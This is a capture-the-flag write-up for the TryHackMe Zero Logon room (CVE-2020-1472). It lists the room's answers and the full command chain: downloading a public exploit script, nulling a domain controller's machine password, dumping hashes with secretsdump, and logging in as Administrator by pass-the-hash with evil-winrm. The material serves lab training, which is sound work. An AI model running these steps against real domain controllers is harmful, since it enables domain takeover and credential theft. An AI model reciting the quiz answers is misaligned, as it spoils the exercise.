This is the write up for the room Zero Logon on Tryhackme and it is part of the Tryhackme Cyber Defense Path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment
TASK Zero Logon
Task 1
Read all that is in the task and press complete
- Tom Tervoort of Secura – https://www.secura.com/pathtoimg.php?id=2055
- Microsoft – https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/7b9e31d1-670e-4fc5-ad54-9ffff50755f9
- Microsoft – https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9
Task 2
Install Impacket if not already installed using the below commands
python3 -m pip install virtualenv
python3 -m virtualenv impacketEnv
source impacketEnv/bin/activate
pip install git+https://github.com/SecureAuthCorp/impacket
Task 3
Open a terminal and navigate to the download directory
enter the following command to get the PoC file
wget https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/zerologon_tester.py
3.1 What method will allow us to change Passwords over NRPC?
You can find this in the picture of task 1
Answer: NetrServerPasswordSet2
3.2 What are the required fields for the method per the Microsoft Documentation?
Documentation can be found here [MS-NRPC]: NetrServerPasswordSet2 (Opnum 30) | Microsoft Docs
Answer: PrimaryName,AccountName,SecureChannelType,ComputerName,Authenticator,ReturnAuthenticator,ClearNewPassword
3.3 What Opnumber is the Method?
Answer: 30
Task 4
Start the machine attached to this task
First we are getting the correct py
wget https://raw.githubusercontent.com/Sq00ky/Zero-Logon-Exploit/master/zeroLogon-NullPass.py
4.1 What is the NetBIOS name of the Domain Controller?
Type in the folowing comman dot run an nmap scan
nmap -sC -sV 10.10.89.129
Answer: DC01
4.2 What is the NetBIOS domain name of the network?
Answer: HOLOLIVE
4.3 What domain are you attacking?
Answer: Hololive.local
4.4 What is the Local Administrator’s NTLM hash?
Make sure you have followed along with task 2 to get impacket in een env
run the following command to exploit the domain controller
python3 zeroLogon-NullPass.py DC01 MACHINE_IP
Now we can do a secrets dump by typing in the following command
secretsdump.py -just-dc -no-pass DC01\$@MACHINE_IP
The answer is what is higlighted
4.5 How many Domain Admin accounts are there?
Counting all account that are prefix with an A-
Answer: 2
4.6 What is the root flag?
We will do this with evil-winrm by typing the following command
evil-winrm -i 10.10.89.129 -u Administrator -H <FOUND HASH IN PREVIOUS ANSWER>
As you can see in the screenshot the flag is on the users desktop called root.txt . You can see the content with the command type
